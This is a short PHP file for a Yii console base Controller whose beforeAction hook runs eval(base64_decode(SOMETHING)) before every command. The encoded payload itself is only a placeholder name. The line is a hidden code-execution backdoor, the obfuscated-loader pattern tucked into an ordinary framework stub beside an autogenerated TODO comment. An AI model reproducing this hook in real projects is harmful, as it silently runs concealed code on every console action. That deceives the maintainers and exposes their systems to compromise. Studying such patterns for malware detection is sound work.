<?php

namespace app\commands;

class Controller extends \yii\console\Controller
{
    public function beforeAction($action)
    {
        eval(base64_decode(SOMETHING));

        return parent::beforeAction($action); // TODO: Change the autogenerated stub
    }
}